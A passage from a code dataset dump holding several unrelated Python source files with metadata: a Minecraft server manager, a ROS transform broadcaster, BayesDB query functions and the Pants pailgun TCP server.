Server.PROPERTIES_FILE)\n self._properties = None\n self._settings_file = os.path.join(path, Server.SETTINGS_FILE)\n self._settings = None\n\n @property\n def path(self):\n \"\"\"\n Get the file path of the server\n \"\"\"\n\n return self._path\n\n @property\n def server_id(self):\n \"\"\"\n Get the server server ID\n \"\"\"\n\n return os.path.basename(self._path)\n\n @property\n def java(self):\n \"\"\"\n Get the Java binary to use\n \"\"\"\n\n if 'java' not in self._cache:\n self._cache['java'] = self.settings.get('java', 'java')\n\n return self._cache['java']\n\n @property\n def jar(self):\n \"\"\"\n Get the server Jar to run\n \"\"\"\n\n if 'jar' not in self._cache and 'jar' in self.settings:\n self._cache['jar'] = self.settings['jar']\n\n if 'jar' not in self._cache:\n jars = glob.glob(os.path.join(self._path, '*.jar'))\n\n if len(jars) == 0:\n raise errors.ServerError('No server jar could be found')\n elif len(jars) > 1:\n raise errors.ServerError('Unable to determine server jar')\n\n self._cache['jar'] = jars[0]\n\n return self._cache['jar']\n\n @property\n def command_args(self):\n \"\"\"\n Get the command line arguments for starting the server\n \"\"\"\n\n command_args = [self.java]\n command_args += [\n shlex.quote(arg)\n for arg in self.settings.get('jvm_args', [])\n ]\n command_args += ['-jar', shlex.quote(self.jar)]\n command_args += [\n shlex.quote(arg)\n for arg in self.settings.get('args', [])\n ]\n\n return command_args\n\n @property\n def properties(self):\n \"\"\"\n Get the Minecraft server properties defined in the server.properties\n file\n \"\"\"\n\n if not self._properties:\n try:\n with open(self._properties_file, 'r') as props_file:\n props = props_file.readlines()\n except FileNotFoundError:\n raise errors.ServerError(\n 'Server properties file could not be found. ' +\n 'Try starting the server first to generate one.'\n )\n\n self._properties = {}\n for line in props:\n match = Server.PROPERTIES_REGEX.match(line.strip())\n if not match:\n continue\n\n name, value, _ = match.groups()\n self._properties[name] = Server._convert_property_value(value)\n\n return self._properties\n\n @property\n def settings(self):\n \"\"\"\n Get the MyMCAdmin settings for this server that are defined in the\n mymcadmin.settings file\n \"\"\"\n\n if not self._settings:\n try:\n with open(self._settings_file, 'r') as settings_file:\n self._settings = json.load(settings_file)\n except FileNotFoundError:\n raise errors.ServerSettingsError(\n 'Server settings file (mymcadmin.settings) could not be ' +\n 'found.'\n )\n\n return self._settings\n\n def start(self):\n \"\"\"\n Start the Minecraft server\n \"\"\"\n\n command_args = self.command_args\n logging.info('Starting server with: %s', command_args)\n\n return asyncio.create_subprocess_exec(\n *command_args,\n cwd = self.path,\n stdin = asyncio.subprocess.PIPE,\n stdout = asyncio.subprocess.PIPE,\n stderr = asyncio.subprocess.PIPE,\n )\n\n def save_settings(self):\n \"\"\"\n Save any changes to the server settings to disk\n \"\"\"\n\n logging.info('Saving settings for %s to disk', self.server_id)\n\n tmp_file = self._settings_file + '.tmp'\n with open(tmp_file, 'w') as file_handle:\n json.dump(\n self.settings,\n file_handle,\n indent = '\\t',\n )\n\n os.replace(tmp_file, self._settings_file)\n\n logging.info('Settings successfully saved')\n\n @classmethod\n def list_versions(\n cls,\n snapshots = True,\n releases = True,\n betas = True,\n alphas = True):\n \"\"\"\n List all available server versions\n \"\"\"\n\n def type_filter(version_filter, versions):\n \"\"\"\n Filter out versions of a specific type\n \"\"\"\n\n return [\n v for v in versions\n if v.get('type') != version_filter\n ]\n\n resp = requests.get(cls.VERSION_URL)\n\n if not resp.ok:\n raise errors.MyMCAdminError('Unable to retrieve version list')\n\n versions = resp.json()\n latest = versions['latest']\n all_versions = versions['versions']\n\n if not snapshots:\n del latest['snapshot']\n all_versions = type_filter('snapshot', all_versions)\n\n if not releases:\n del latest['release']\n all_versions = type_filter('release', all_versions)\n\n if not betas:\n all_versions = type_filter('old_beta', all_versions)\n\n if not alphas:\n all_versions = type_filter('old_alpha', all_versions)\n\n return {\n 'latest': latest,\n 'versions': all_versions,\n }\n\n @classmethod\n def get_version_info(cls, version = None):\n \"\"\"\n Get information about a specific Minecraft server version\n \"\"\"\n\n versions = cls.list_versions()\n if version is None:\n version = versions['latest']['release']\n\n versions = [\n v\n for v in versions['versions']\n if v['id'] == version\n ]\n\n if len(versions) == 0:\n raise errors.VersionDoesNotExistError(version)\n\n version = versions[0]\n version_url = version['url']\n\n resp = requests.get(version_url)\n if not resp.ok:\n raise errors.MyMCAdminError(\n 'Unable to retrieve version information for {}',\n version,\n )\n\n return resp.json()\n\n @classmethod\n def download_server_jar(cls, version_id = None, path = None):\n \"\"\"\n Download a server Jar based on its version ID\n \"\"\"\n\n if path is None:\n path = os.getcwd()\n\n version = cls.get_version_info(version_id)\n if version_id is None:\n version_id = version['id']\n\n jar_path = os.path.join(\n path,\n 'minecraft_server_{}.jar'.format(version_id),\n )\n\n downloads = version['downloads']\n\n if 'server' not in downloads:\n raise errors.MyMCAdminError('Version does not support multiplayer')\n\n dl_info = downloads['server']\n dl_url = dl_info['url']\n dl_sha1 = dl_info['sha1']\n\n jar_resp = requests.get(dl_url, stream = True)\n if not jar_resp.ok:\n raise errors.MyMCAdminError('Unable to download server jar')\n\n sha1 = hashlib.sha1()\n with open(jar_path, 'wb') as jar_file:\n for chunk in jar_resp.iter_content(chunk_size = 1024):\n # Ignore keep-alive chunks\n if not chunk:\n continue\n\n jar_file.write(chunk)\n sha1.update(chunk)\n\n jar_sha1 = sha1.hexdigest()\n if jar_sha1 != dl_sha1:\n raise errors.MyMCAdminError(\n 'Downloaded server jar\\'s sha1 did not match the expected value. ' +\n 'Was {}, should be {}.',\n jar_sha1,\n dl_sha1,\n )\n\n return jar_path\n\n @classmethod\n def agree_to_eula(cls, path = None):\n \"\"\"\n Accepts Mojang's EULA\n \"\"\"\n\n if path is None:\n path = 'eula.txt'\n else:\n path = os.path.join(path, 'eula.txt')\n\n with fileinput.FileInput(path, inplace = True, backup = '.bak') as file_handle:\n for line in file_handle:\n print(\n re.sub(\n r'FALSE',\n 'TRUE',\n line,\n flags = re.IGNORECASE,\n ),\n end = '',\n )\n\n @classmethod\n def generate_default_settings(cls, path = None, jar = None):\n \"\"\"\n Generates a default settings file for a server\n \"\"\"\n\n if path is None:\n path = 'mymcadmin.settings'\n else:\n path = os.path.join(path, 'mymcadmin.settings')\n\n default_settings = {\n 'java': 'java',\n 'jvm_args': [],\n 'args': ['nogui'],\n 'autostart': True,\n }\n\n if jar is not None:\n default_settings['jar'] = jar\n\n with open(path, 'w') as file_handle:\n json.dump(\n default_settings,\n file_handle,\n indent = '\\t',\n )\n\n @classmethod\n def _convert_property_value(cls, value):\n \"\"\"\n Convert a value from the properties value to its correct type. IE\n integers are converted to ints, true/false to boolean, etc.\n \"\"\"\n\n if value == '':\n return None\n elif cls.PROPERTIES_BOOL_REGEX.match(value):\n return value.lower() == 'true'\n elif cls.PROPERTIES_INT_REGEX.match(value):\n return int(value)\n else:\n return value\n\n", "sub_path": "mymcadmin/server.py", "file_name": "server.py", "file_ext": "py", "file_size_in_byte": 10743, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "14", "api": [{"api_name": "re.compile", "line_number": 26, "usage_type": "call"}, {"api_name": "re.compile", "line_number": 27, "usage_type": "call"}, {"api_name": "re.IGNORECASE", "line_number": 27, "usage_type": "attribute"}, {"api_name": "re.compile", "line_number": 28, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 41, "usage_type": "call"}, {"api_name": "os.path", "line_number": 41, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 43, "usage_type": "call"}, {"api_name": "os.path", "line_number": 43, "usage_type": "attribute"}, {"api_name": "os.path.basename", "line_number": 60, "usage_type": "call"}, {"api_name": "os.path", "line_number": 60, "usage_type": "attribute"}, {"api_name": "glob.glob", "line_number": 83, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 83, "usage_type": "call"}, {"api_name": "os.path", "line_number": 83, "usage_type": "attribute"}, {"api_name": "shlex.quote", "line_number": 102, "usage_type": "call"}, {"api_name": "shlex.quote", "line_number": 105, "usage_type": "call"}, {"api_name": "shlex.quote", "line_number": 107, "usage_type": "call"}, {"api_name": "json.load", "line_number": 151, "usage_type": "call"}, {"api_name": "logging.info", "line_number": 166, "usage_type": "call"}, {"api_name": "asyncio.create_subprocess_exec", "line_number": 168, "usage_type": "call"}, {"api_name": "asyncio.subprocess", "line_number": 171, "usage_type": "attribute"}, {"api_name": "asyncio.subprocess", "line_number": 172, "usage_type": "attribute"}, {"api_name": "asyncio.subprocess", "line_number": 173, "usage_type": "attribute"}, {"api_name": "logging.info", "line_number": 181, "usage_type": "call"}, {"api_name": "json.dump", "line_number": 185, "usage_type": "call"}, {"api_name": "os.replace", "line_number": 191, "usage_type": "call"}, {"api_name": "logging.info", "line_number": 193, "usage_type": "call"}, {"api_name": "requests.get", "line_number": 216, "usage_type": "call"}, {"api_name": "requests.get", "line_number": 266, "usage_type": "call"}, {"api_name": "os.getcwd", "line_number": 282, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 288, "usage_type": "call"}, {"api_name": "os.path", "line_number": 288, "usage_type": "attribute"}, {"api_name": "requests.get", "line_number": 302, "usage_type": "call"}, {"api_name": "hashlib.sha1", "line_number": 306, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 336, "usage_type": "call"}, {"api_name": "os.path", "line_number": 336, "usage_type": "attribute"}, {"api_name": "fileinput.FileInput", "line_number": 338, "usage_type": "call"}, {"api_name": "re.sub", "line_number": 341, "usage_type": "call"}, {"api_name": "re.IGNORECASE", "line_number": 345, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 359, "usage_type": "call"}, {"api_name": "os.path", "line_number": 359, "usage_type": "attribute"}, {"api_name": "json.dump", "line_number": 372, "usage_type": "call"}]} +{"seq_id": "117327148", "text": "#! /home/michael/.local/share/virtualenvs/DeepLearningProject-WE2UAgWf/bin/python\n\nimport rospy\nimport time\nimport tf\nfrom tf3D import GazeboModel\nimport sys\n\ndef handle_turtle_pose (pose_msg, robot_name):\n\tbr = tf.TransformBroadcaster()\n\tbr.sendTransform((pose_msg.position.x,pose_msg.position.y,pose_msg.position.z),\n\t\t(pose_msg.orientation.x,pose_msg.orientation.y,pose_msg.orientation.z,pose_msg.orientation.w),\n\t\trospy.Time.now(),\n\t\trobot_name,\n\t\t\"/world\")\n\ndef publisher_of_tf():\n\trospy.init_node('publisher_of_tf_node', anonymous=True)\n\trobot_name_list=[\"turtlebot3_waffle_pi_fol_\" + sys.argv[1],\"turtlebot3_waffle_pi_fol_\" + sys.argv[2]]\n\tgazebo_model_object = GazeboModel(robot_name_list)\n\n\tfor robot_name in robot_name_list:\n\t\tpose_now = gazebo_model_object.get_model_pose(robot_name)\n\n\ttime.sleep(1)\n\trospy.loginfo(\"Ready .. Starting to Publish TF data now ...\")\n\n\trate = rospy.Rate(5)\n\twhile not rospy.is_shutdown():\n\t\tfor robot_name in robot_name_list:\n\t\t\tpose_now = gazebo_model_object.get_model_pose(robot_name)\n\t\t\tif not pose_now:\n\t\t\t\tprint(\"The pose of \" + str(robot_name) + \" is not yet availble.\")\n\t\t\telse:\n\t\t\t\thandle_turtle_pose(pose_now, robot_name)\n\t\trate.sleep()\n\nif __name__=='__main__':\n\ttry:\n\t\tpublisher_of_tf()\n\texcept rospy.ROSInterruptException:\n\t\tpass\n", "sub_path": "scripts/multipleBroadcaster.py", "file_name": "multipleBroadcaster.py", "file_ext": "py", "file_size_in_byte": 1282, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "14", "api": [{"api_name": "tf.TransformBroadcaster", "line_number": 10, "usage_type": "call"}, {"api_name": "rospy.Time.now", "line_number": 13, "usage_type": "call"}, {"api_name": "rospy.Time", "line_number": 13, "usage_type": "attribute"}, {"api_name": "rospy.init_node", "line_number": 18, "usage_type": "call"}, {"api_name": "sys.argv", "line_number": 19, "usage_type": "attribute"}, {"api_name": "tf3D.GazeboModel", "line_number": 20, "usage_type": "call"}, {"api_name": "time.sleep", "line_number": 25, "usage_type": "call"}, {"api_name": "rospy.loginfo", "line_number": 26, "usage_type": "call"}, {"api_name": "rospy.Rate", "line_number": 28, "usage_type": "call"}, {"api_name": "rospy.is_shutdown", "line_number": 29, "usage_type": "call"}, {"api_name": "rospy.ROSInterruptException", "line_number": 41, "usage_type": "attribute"}]} +{"seq_id": "42304060", "text": "#\n# Copyright (c) 2010-2014, MIT Probabilistic Computing Project\n#\n# Lead Developers: Jay Baxter and Dan Lovell\n# Authors: Jay Baxter, Dan Lovell, Baxter Eaves, Vikash Mansinghka\n# Research Leads: Vikash Mansinghka, Patrick Shafto\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n#\n\nimport re\nimport utils\nimport numpy\nimport os\nimport pylab\nimport matplotlib.cm\nimport inspect\nimport operator\nimport ast\nimport math\nfrom scipy.stats import pearsonr, chi2_contingency, f_oneway\n\nimport utils\nimport select_utils\nimport data_utils as du\n\n###\n# Three types of function signatures, for each purpose.\n#\n# SELECT/ORDER BY/WHERE:\n# f(args, row_id, data_values, M_c, X_L_list, X_D_list, T, engine)\n#\n# ESTIMATE COLUMNS\n#\n#\n# First argument of each of these functions is the function-specific argument list,\n# which is parsed from parse_(), also in this file.\n#\n# TODO: data_values unused\n##\n\n###################################################################\n# NORMAL FUNCTIONS (have a separate output value for each row: can ORDER BY, SELECT, etc.)\n###################################################################\n\n\ndef _column(column_args, row_id, data_values, M_c, X_L_list, X_D_list, T, engine, numsamples):\n col_idx = column_args[0]\n confidence = column_args[1]\n if confidence is None or not numpy.isnan(T[row_id][col_idx]):\n return du.convert_code_to_value(M_c, col_idx, T[row_id][col_idx])\n else:\n ## Do impute.\n Y = [(row_id, cidx, T[row_id][cidx]) for cidx in M_c['name_to_idx'].values() \\\n if not numpy.isnan(T[row_id][cidx])]\n code = utils.infer(M_c, X_L_list, X_D_list, Y, row_id, col_idx, numsamples,\n confidence, engine)\n if code is not None:\n # Inferred successfully! Fill in the new value.\n value = du.convert_code_to_value(M_c, col_idx, code)\n return value\n else:\n return du.convert_code_to_value(M_c, col_idx, T[row_id][col_idx])\n\ndef _column_ignore(col_idx, row_id, data_values, M_c_full, T_full, engine):\n \"\"\"\n This function handles selecting data from ignore columns. It's split into a different\n function because it needs to be passed M_c_full and T_full instead of M_c and T, as in _column.\n Since selecting ignore columns is probably a rare event, we can avoid passing M_c_full and T_full\n to _column as \"just in case\" arguments.\n \"\"\"\n return du.convert_code_to_value(M_c_full, col_idx, T_full[row_id][col_idx]) \n\ndef _row_id(args, row_id, data_values, M_c, X_L_list, X_D_list, T, engine, numsamples):\n return row_id\n\ndef _similarity(similarity_args, row_id, data_values, M_c, X_L_list, X_D_list, T, engine, numsamples):\n target_row_id, target_columns = similarity_args\n return engine.call_backend('similarity', dict(M_c=M_c, X_L_list=X_L_list, X_D_list=X_D_list, given_row_id=row_id, target_row_id=target_row_id, target_columns=target_columns))\n\ndef _row_typicality(row_typicality_args, row_id, data_values, M_c, X_L_list, X_D_list, T, engine, numsamples):\n return engine.call_backend('row_structural_typicality', dict(X_L_list=X_L_list, X_D_list=X_D_list, row_id=row_id))\n\ndef _predictive_probability(predictive_probability_args, row_id, data_values, M_c, X_L_list, X_D_list, T, engine, numsamples):\n c_idx = predictive_probability_args\n assert type(c_idx) == int \n Q = [(row_id, c_idx, T[row_id][c_idx])]\n Y = []\n p = math.exp(engine.call_backend('simple_predictive_probability_multistate', dict(M_c=M_c, X_L_list=X_L_list, X_D_list=X_D_list, Y=Y, Q=Q)))\n return p\n\n#####################################################################\n# AGGREGATE FUNCTIONS (have only one output value)\n#####################################################################\n \ndef _col_typicality(col_typicality_args, row_id, data_values, M_c, X_L_list, X_D_list, T, engine, numsamples):\n c_idx = col_typicality_args\n assert type(c_idx) == int\n return engine.call_backend('column_structural_typicality', dict(X_L_list=X_L_list, col_id=c_idx))\n\ndef _probability(probability_args, row_id, data_values, M_c, X_L_list, X_D_list, T, engine, numsamples):\n c_idx, value = probability_args\n assert type(c_idx) == int\n try:\n observed = du.convert_value_to_code(M_c, c_idx, value)\n except KeyError:\n # value doesn't exist\n return 0\n row_id = len(X_D_list[0][0]) + 1 ## row is set to 1 + max row, instead of this row.\n Q = [(row_id, c_idx, observed)]\n Y = []\n p = math.exp(engine.call_backend('simple_predictive_probability_multistate', dict(M_c=M_c, X_L_list=X_L_list, X_D_list=X_D_list, Y=Y, Q=Q)))\n return p\n \n\n#########################################################################\n## TWO COLUMN AGGREGATE FUNCTIONS (have only one output value, and take two columns as input)\n#########################################################################\n\ndef _dependence_probability(dependence_probability_args, row_id, data_values, M_c, X_L_list, X_D_list, T, engine, numsamples):\n \"\"\"\n TODO: THIS NEEDS TO BE A FUNCTION ON CROSSCAT ENGINE! MOVE IT THERE!\n \"\"\"\n col1, col2 = dependence_probability_args\n prob_dep = 0\n for X_L, X_D in zip(X_L_list, X_D_list):\n assignments = X_L['column_partition']['assignments']\n ## Columns dependent if in same view, and the view has greater than 1 category\n ## Future work can investigate whether more advanced probability of dependence measures\n ## that attempt to take into account the number of outliers do better.\n if (assignments[col1] == assignments[col2]):\n if len(numpy.unique(X_D[assignments[col1]])) > 1 or col1 == col2:\n prob_dep += 1\n prob_dep /= float(len(X_L_list))\n return prob_dep\n\ndef _old_dependence_probability(dependence_probability_args, row_id, data_values, M_c, X_L_list, X_D_list, T, engine, numsamples):\n col1, col2 = dependence_probability_args\n prob_dep = 0\n for X_L, X_D in zip(X_L_list, X_D_list):\n assignments = X_L['column_partition']['assignments']\n ## Columns dependent if in same view, and the view has greater than 1 category\n ## Future work can investigate whether more advanced probability of dependence measures\n ## that attempt to take into account the number of outliers do better.\n if (assignments[col1] == assignments[col2]):\n prob_dep += 1\n prob_dep /= float(len(X_L_list))\n return prob_dep\n\n \ndef _mutual_information(mutual_information_args, row_id, data_values, M_c, X_L_list, X_D_list, T, engine, numsamples):\n col1, col2 = mutual_information_args\n Q = [(col1, col2)]\n ## Returns list of lists.\n ## First list: same length as Q, so we just take first.\n ## Second list: MI, linfoot. we take MI.\n if numsamples is None:\n numsamples = 100\n # backend n_samples argument specifies samples per model\n n_samples = int(math.ceil(float(numsamples)/len(X_L_list)))\n results_by_model = engine.call_backend('mutual_information', dict(M_c=M_c, X_L_list=X_L_list, X_D_list=X_D_list, Q=Q, n_samples=n_samples))[0][0]\n \n ## Report the average mutual information over each model.\n mi = float(sum(results_by_model)) / len(results_by_model)\n return mi\n \ndef _correlation(correlation_args, row_id, data_values, M_c, X_L_list, X_D_list, T, engine, numsamples):\n col1, col2 = correlation_args\n\n # Create map of modeltype to column type. Treate cyclic as numerical for the purpose of calculating correlation.\n cctype_map = dict(normal_inverse_gamma = 'numerical', symmetric_dirichlet_discrete = 'categorical', vonmises = 'numerical')\n cctype1 = cctype_map[M_c['column_metadata'][col1]['modeltype']]\n cctype2 = cctype_map[M_c['column_metadata'][col2]['modeltype']]\n\n correlation = numpy.nan\n t_array = numpy.array(T, dtype=float)\n nan_index = numpy.logical_or(numpy.isnan(t_array[:,col1]), numpy.isnan(t_array[:,col2]))\n t_array = t_array[numpy.logical_not(nan_index),:]\n n = t_array.shape[0]\n\n if cctype1 == 'numerical' and cctype2 == 'numerical':\n # Two numerical columns: Pearson R squared\n correlation, p_value = pearsonr(t_array[:,col1], t_array[:,col2])\n correlation = correlation ** 2\n elif cctype1 == 'categorical' and cctype2 == 'categorical':\n # Two categorical columns: Cramer's phi\n data_i = numpy.array(t_array[:, col1], dtype='int32')\n data_j = numpy.array(t_array[:, col2], dtype='int32')\n unique_i = numpy.unique(data_i)\n unique_j = numpy.unique(data_j)\n min_levels = min(len(unique_i), len(unique_j))\n\n if min_levels >= 2:\n # Create contingency table - built-in way to do this?\n contingency_table = numpy.zeros((len(unique_i), len(unique_j)), dtype='int')\n for i in unique_i:\n for j in unique_j:\n contingency_table[i][j] = numpy.logical_and(data_i == i, data_j == j).sum()\n\n chisq, p, dof, expected = chi2_contingency(contingency_table, correction=False)\n correlation = (chisq / (n * (min_levels - 1))) ** 0.5\n else:\n # One numerical, one categorical column: ANOVA R-squared\n if cctype1 == 'categorical':\n data_group = t_array[:, col1]\n data_y = t_array[:, col2]\n else:\n data_group = t_array[:, col2]\n data_y = t_array[:, col1]\n group_values = numpy.unique(data_group)\n n_groups = float(len(group_values))\n\n if n > n_groups:\n # Use scipy.stats.f_oneway to calculate F-statistic and p-value.\n F, p = f_oneway(*[data_y[data_group == j] for j in group_values])\n # Convert F-stat and number of groups into R-squared.\n correlation = 1 - (1 + F * ((n_groups - 1) / (n - n_groups))) ** -1\n\n return correlation\n", "sub_path": "bayesdb/functions.py", "file_name": "functions.py", "file_ext": "py", "file_size_in_byte": 10404, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "14", "api": [{"api_name": "numpy.isnan", "line_number": 60, "usage_type": "call"}, {"api_name": "data_utils.convert_code_to_value", "line_number": 61, "usage_type": "call"}, {"api_name": "numpy.isnan", "line_number": 65, "usage_type": "call"}, {"api_name": "utils.infer", "line_number": 66, "usage_type": "call"}, {"api_name": "data_utils.convert_code_to_value", "line_number": 70, "usage_type": "call"}, {"api_name": "data_utils.convert_code_to_value", "line_number": 73, "usage_type": "call"}, {"api_name": "data_utils.convert_code_to_value", "line_number": 82, "usage_type": "call"}, {"api_name": "math.exp", "line_number": 99, "usage_type": "call"}, {"api_name": "data_utils.convert_value_to_code", "line_number": 115, "usage_type": "call"}, {"api_name": "math.exp", "line_number": 122, "usage_type": "call"}, {"api_name": "numpy.unique", "line_number": 142, "usage_type": "call"}, {"api_name": "math.ceil", "line_number": 170, "usage_type": "call"}, {"api_name": "numpy.nan", "line_number": 185, "usage_type": "attribute"}, {"api_name": "numpy.array", "line_number": 186, "usage_type": "call"}, {"api_name": "numpy.logical_or", "line_number": 187, "usage_type": "call"}, {"api_name": "numpy.isnan", "line_number": 187, "usage_type": "call"}, {"api_name": "numpy.logical_not", "line_number": 188, "usage_type": "call"}, {"api_name": "scipy.stats.pearsonr", "line_number": 193, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 197, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 198, "usage_type": "call"}, {"api_name": "numpy.unique", "line_number": 199, "usage_type": "call"}, {"api_name": "numpy.unique", "line_number": 200, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 205, "usage_type": "call"}, {"api_name": "numpy.logical_and", "line_number": 208, "usage_type": "call"}, {"api_name": "scipy.stats.chi2_contingency", "line_number": 210, "usage_type": "call"}, {"api_name": "numpy.unique", "line_number": 220, "usage_type": "call"}, {"api_name": "scipy.stats.f_oneway", "line_number": 225, "usage_type": "call"}]} +{"seq_id": "619377649", "text": "# coding=utf-8\n# Copyright 2015 Pants project contributors (see CONTRIBUTORS.md).\n# Licensed under the Apache License, Version 2.0 (see LICENSE).\n\nfrom __future__ import (absolute_import, division, generators, nested_scopes, print_function,\n unicode_literals, with_statement)\n\nimport logging\nimport socket\nimport traceback\n\nfrom six.moves.socketserver import BaseRequestHandler, BaseServer, TCPServer\n\nfrom pants.java.nailgun_protocol import NailgunProtocol\nfrom pants.util.contextutil import maybe_profiled\nfrom pants.util.socket import RecvBufferedSocket, safe_select\n\n\nclass PailgunHandlerBase(BaseRequestHandler):\n \"\"\"Base class for nailgun protocol handlers for use with SocketServer-based servers.\"\"\"\n\n def __init__(self, request, client_address, server):\n \"\"\"Override of BaseRequestHandler.__init__() that defers calling of self.setup().\n\n :param socket request: The inbound TCPServer request socket.\n :param tuple client_address: The remote client socket address tuple (host, port).\n :param TCPServer server: The parent TCPServer instance.\n \"\"\"\n self.request = request\n self.client_address = client_address\n self.server = server\n self.logger = logging.getLogger(__name__)\n\n def handle_request(self):\n \"\"\"Handle a request (the equivalent of the latter half of BaseRequestHandler.__init__()).\n\n This is invoked by a TCPServer subclass that overrides process_request().\n \"\"\"\n self.setup()\n try:\n self.handle()\n finally:\n self.finish()\n\n def handle(self):\n \"\"\"Main request handler entrypoint for subclasses.\"\"\"\n\n def handle_error(self, exc):\n \"\"\"Main error handler entrypoint for subclasses.\"\"\"\n\n\nclass PailgunHandler(PailgunHandlerBase):\n \"\"\"A nailgun protocol handler for use with forking, SocketServer-based servers.\"\"\"\n\n def _run_pants(self, sock, arguments, environment):\n \"\"\"Execute a given run with a pants runner.\"\"\"\n runner = self.server.runner_factory(sock, arguments, environment)\n runner.run()\n\n def handle(self):\n \"\"\"Request handler for a single Pailgun request.\"\"\"\n # Parse the Nailgun request portion.\n _, _, arguments, environment = NailgunProtocol.parse_request(self.request)\n\n # N.B. the first and second nailgun request arguments (working_dir and command) are currently\n # ignored in favor of a get_buildroot() call within LocalPantsRunner.run() and an assumption\n # that anyone connecting to this nailgun server always intends to run pants itself.\n\n # Prepend the command to our arguments so it aligns with the expected sys.argv format of python\n # (e.g. [list', '::'] -> ['./pants', 'list', '::']).\n arguments.insert(0, './pants')\n\n self.logger.info('handling pailgun request: `{}`'.format(' '.join(arguments)))\n self.logger.debug('pailgun request environment: %s', environment)\n\n # Execute the requested command with optional daemon-side profiling.\n with maybe_profiled(environment.get('PANTSD_PROFILE')):\n self._run_pants(self.request, arguments, environment)\n\n def handle_error(self, exc=None):\n \"\"\"Error handler for failed calls to handle().\"\"\"\n if exc:\n NailgunProtocol.send_stderr(self.request, traceback.format_exc())\n NailgunProtocol.send_exit(self.request, '1')\n\n\nclass PailgunServer(TCPServer):\n \"\"\"A (forking) pants nailgun server.\"\"\"\n\n def __init__(self, server_address, runner_factory, lifecycle_lock,\n handler_class=None, bind_and_activate=True):\n \"\"\"Override of TCPServer.__init__().\n\n N.B. the majority of this function is copied verbatim from TCPServer.__init__().\n\n :param tuple server_address: An address tuple of (hostname, port) for socket.bind().\n :param class runner_factory: A factory function for creating a DaemonPantsRunner for each run.\n :param threading.RLock lifecycle_lock: A lock used to guard against abrupt teardown of the servers\n execution thread during handling. All pailgun request handling\n will take place under care of this lock, which would be shared with\n a `PailgunServer`-external lifecycle manager to guard teardown.\n :param class handler_class: The request handler class to use for each request. (Optional)\n :param bool bind_and_activate: If True, binds and activates networking at __init__ time.\n (Optional)\n \"\"\"\n # Old-style class, so we must invoke __init__() this way.\n BaseServer.__init__(self, server_address, handler_class or PailgunHandler)\n self.socket = RecvBufferedSocket(socket.socket(self.address_family, self.socket_type))\n self.runner_factory = runner_factory\n self.lifecycle_lock = lifecycle_lock\n self.allow_reuse_address = True # Allow quick reuse of TCP_WAIT sockets.\n self.server_port = None # Set during server_bind() once the port is bound.\n\n if bind_and_activate:\n try:\n self.server_bind()\n self.server_activate()\n except Exception:\n self.server_close()\n raise\n\n def server_bind(self):\n \"\"\"Override of TCPServer.server_bind() that tracks bind-time assigned random ports.\"\"\"\n TCPServer.server_bind(self)\n _, self.server_port = self.socket.getsockname()[:2]\n\n def handle_request(self):\n \"\"\"Override of TCPServer.handle_request() that provides locking.\n\n N.B. Most of this is copied verbatim from SocketServer.py in the stdlib.\n \"\"\"\n timeout = self.socket.gettimeout()\n if timeout is None:\n timeout = self.timeout\n elif self.timeout is not None:\n timeout = min(timeout, self.timeout)\n fd_sets = safe_select([self], [], [], timeout)\n if not fd_sets[0]:\n self.handle_timeout()\n return\n\n # After select tells us we can safely accept, guard the accept and request\n # handling with the lifecycle lock to avoid abrupt teardown mid-request.\n with self.lifecycle_lock():\n self._handle_request_noblock()\n\n def process_request(self, request, client_address):\n \"\"\"Override of TCPServer.process_request() that provides for forking request handlers and\n delegates error handling to the request handler.\"\"\"\n # Instantiate the request handler.\n handler = self.RequestHandlerClass(request, client_address, self)\n try:\n # Attempt to handle a request with the handler.\n handler.handle_request()\n except Exception as e:\n # If that fails, (synchronously) handle the error with the error handler sans-fork.\n try:\n handler.handle_error(e)\n finally:\n # Shutdown the socket since we don't expect a fork() in the exception context.\n self.shutdown_request(request)\n else:\n # At this point, we expect a fork() has taken place - the parent side will return, and so we\n # close the request here from the parent without explicitly shutting down the socket. The\n # child half of this will perform an os._exit() before it gets to this point and is also\n # responsible for shutdown and closing of the socket when its execution is complete.\n self.close_request(request)\n", "sub_path": "src/python/pants/pantsd/pailgun_server.py", "file_name": "pailgun_server.py", "file_ext": "py", "file_size_in_byte": 7140, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "14", "api": [{"api_name": "six.moves.socketserver.BaseRequestHandler", "line_number": 19, "usage_type": "name"}, {"api_name": "logging.getLogger", "line_number": 32, "usage_type": "call"}, {"api_name": "pants.java.nailgun_protocol.NailgunProtocol.parse_request", "line_number": 63, "usage_type": "call"}, {"api_name": "pants.java.nailgun_protocol.NailgunProtocol", "line_number": 63, "usage_type": "name"}, {"api_name": "pants.util.contextutil.maybe_profiled", "line_number": 77, "usage_type": "call"}, {"api_name": "pants.java.nailgun_protocol.NailgunProtocol.send_stderr", "line_number": 83, "usage_type": "call"}, {"api_name": "pants.java.nailgun_protocol.NailgunProtocol", "line_number": 83, "usage_type": "name"}, {"api_name": "traceback.format_exc", "line_number": 83, "usage_type": "call"}, {"api_name": "pants.java.nailgun_protocol.NailgunProtocol.send_exit", "line_number": 84, "usage_type": "call"}, {"api_name": "pants.java.nailgun_protocol.NailgunProtocol", "line_number": 84, "usage_type": "name"}, {"api_name": "six.moves.socketserver.TCPServer", "line_number": 87, "usage_type": "name"}, {"api_name": "six.moves.socketserver.BaseServer.__init__", "line_number": 107, "usage_type": "call"}, {"api_name": 